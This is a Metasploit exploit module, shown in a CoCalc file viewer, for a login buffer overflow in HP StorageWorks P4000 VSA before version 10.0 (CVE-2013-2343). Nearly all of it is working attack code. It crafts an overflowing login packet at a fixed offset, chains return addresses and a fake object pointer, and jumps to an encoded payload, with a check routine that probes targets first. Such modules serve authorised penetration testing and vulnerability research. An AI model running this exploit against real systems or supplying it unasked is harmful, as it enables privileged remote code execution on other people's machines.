CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
14
      'Description'    => %q{
15
        This module exploits a buffer overflow vulnerability found in HP's StorageWorks
16
        P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
17
        of the sscanf() function when parsing login requests. This module has been tested
18
        successfully on the HP VSA 9 Virtual Appliance.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
24
          'juan vazquez' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2013-2343'],
29
          ['OSVDB', '94701'],
30
          ['ZDI', '13-179'],
31
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
32
        ],
33
      'Payload'        =>
34
        {
35
          'BadChars'       => "\x2f\x00\x0d\x0a",
36
          'Space'          => 780,
37
          'DisableNops'    => true,
38
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
39
        },
40
      'DefaultOptions'  =>
41
        {
42
          'EXITFUNC' => 'thread'
43
        },
44
      'Platform'       => ['linux'],
45
      'Arch'           => ARCH_X86,
46
      'Targets'        =>
47
        [
48
          [ 'HP VSA 9',
49
            {
50
              'Version'    => '9.0.0',
51
              'Offset'     => 3446,
52
              'Ret'        => 0x0804EB34, # pop ebp # ret # from hydra
53
              'FakeObject' => 0x08072E58, # from hydra data
54
              'JmpEsp'     => 0x08050CB8  # push esp # ret # from hydra
55
            }
56
          ]
57
        ],
58
      'Privileged'     => true,
59
      'DisclosureDate' => '2013-06-28',
60
      'DefaultTarget'  => 0))
61

62
    register_options(
63
      [
64
        OptPort.new('RPORT', [true, 'The remote port', 13838])
65
      ])
66
  end
67

68
  def check
69
    connect
70
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
71
    vprint_status("#{rhost}:#{rport} Sending login packet to check...")
72
    sock.put(packet)
73
    res = sock.get_once
74
    disconnect
75

76
    if res and res=~ /OK/ and res =~ /Login/
77
      return Exploit::CheckCode::Appears
78
    elsif res and res =~ /FAILED/ and res =~ /version/
79
      return Exploit::CheckCode::Detected
80
    end
81

82
    return Exploit::CheckCode::Safe
83
  end
84

85
  def generate_packet(data)
86
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
87
    pkt << [data.length + 1].pack("N*")
88
    pkt << "\x00\x00\x00\x00"
89
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
90
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
91
    pkt << data
92
    pkt << "\x00"
93

94
    pkt
95
  end
96

97
  def exploit
98
    connect
99
    print_status("#{rhost}:#{rport} Sending login packet")
100
    my_bof = rand_text(target['Offset'])
101
    my_bof << [target.ret].pack("V")
102
    my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
103
    my_bof << [target['JmpEsp']].pack("V")
104
    my_bof << payload.encoded
105

106
    packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
107
    sock.put(packet)
108
    disconnect
109
  end
110
end
111

112

113